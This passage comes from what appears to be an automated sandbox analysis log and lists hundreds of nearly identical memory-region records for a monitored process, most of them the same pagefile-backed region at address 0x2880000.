0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11176 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11177 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11178 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11179 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11180 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11181 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11182 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11183 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11184 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11185 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11186 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11187 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11188 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11189 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11190 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11191 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11192 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11193 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11194 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11195 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11196 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11197 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11198 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11199 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11200 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11201 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11202 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11203 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11204 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11205 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11206 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11207 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11208 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11209 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11210 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11211 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11212 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11213 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11214 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11215 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 11216 start_va = 0x4140000 end_va = 0x415dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 11217 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11218 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11219 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11220 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11221 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11222 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11223 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11224 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11225 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11226 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11227 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11228 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11229 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11230 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11231 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11232 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11233 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11234 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11235 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11236 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11237 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11238 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11239 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11240 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11241 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11242 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11243 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11244 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11245 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11246 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11247 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11248 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11249 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11250 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11251 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11252 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11253 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11254 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11255 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11256 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11257 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11258 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11259 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11260 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11261 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11262 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11263 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11264 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11265 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11266 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11267 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11268 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11269 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11270 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11271 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11272 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11273 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11274 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11275 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11276 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11277 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11278 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11279 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11280 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11281 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11282 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11283 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11284 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11285 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11286 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11287 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11288 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11289 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11290 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11291 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11292 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11293 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11294 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11295 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11296 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11297 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11298 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11299 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11300 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11301 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11302 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11303 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11304 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11305 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11306 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11307 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11308 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11309 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11310 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11311 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11312 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11313 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11314 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11315 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11316 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11317 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11318 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11319 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11320 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11321 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11322 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11323 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 11324 start_va = 0x4140000 end_va = 0x415dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 11325 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11326 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11327 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11328 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11329 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11330 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11331 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11332 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11333 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11334 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11335 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11336 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11337 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11338 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11339 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11340 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11341 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11342 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11343 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11344 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11345 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11346 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11347 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11348 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11349 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11350 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11351 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11352 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11353 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11354 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11355 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11356 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11357 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11358 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11359 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11360 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11361 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11362 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: 